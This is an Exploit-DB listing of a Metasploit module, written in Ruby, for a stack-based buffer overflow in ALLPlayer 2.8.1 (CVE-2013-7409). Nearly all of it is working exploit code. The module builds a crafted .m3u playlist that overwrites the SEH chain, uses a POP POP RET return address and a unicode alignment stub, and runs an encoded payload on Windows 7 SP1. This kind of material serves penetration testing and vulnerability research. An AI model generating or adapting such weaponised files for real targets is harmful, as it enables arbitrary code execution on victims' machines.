ALLPlayer - '.m3u' Local Buffer Overflow (Metasploit)

EDB-ID:

32074

CVE:

2013-7409

EDB Verified:

Author:

Metasploit

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2014-03-05

Vulnerable App: 
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ALLPlayer M3U Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability in
        ALLPlayer 2.8.1, caused by a long string in a playlist entry.
        By persuading the victim to open a specially-crafted .M3U file, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash. This module has been tested successfully on
        Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom',      # Vulnerability discovery
          'Mike Czumak',  # Original exploit
          'Gabor Seljan'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'BID', '62926' ],
          [ 'BID', '63896' ],
          [ 'EDB', '28855' ],
          [ 'EDB', '29549' ],
          [ 'EDB', '29798' ],
          [ 'EDB', '32041' ],
          [ 'OSVDB', '98283' ],
          [ 'URL', 'http://www.allplayer.org/' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'DisableNops'    => true,
          'BadChars'       => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
          'Space'          => 3060,
          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'EAX'
            }
        },
      'Targets'        =>
        [
          [ ' ALLPlayer 2.8.1 / Windows 7 SP1',
            {
              'Offset' => 301,
              'Ret'    => "\x50\x45",  # POP POP RET from ALLPlayer.exe
              'Nop'    => "\x6e"       # ADD BYTE PTR DS:[ESI],CH
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Oct 09 2013',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
        ],
      self.class)

  end


  def exploit
    nop = target['Nop']

    sploit =  rand_text_alpha_upper(target['Offset'])
    sploit << "\x61\x50"      # POPAD
    sploit << target.ret
    sploit << "\x53"          # PUSH EBX
    sploit << nop
    sploit << "\x58"          # POP EAX
    sploit << nop
    sploit << "\x05\x14\x11"  # ADD EAX,0x11001400
    sploit << nop
    sploit << "\x2d\x13\x11"  # SUB EAX,0x11001300
    sploit << nop
    sploit << "\x50"          # PUSH EAX
    sploit << nop
    sploit << "\xc3"          # RET
    sploit << nop * 109
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(10000) # Generate exception

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create("http://" + sploit)

  end
end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services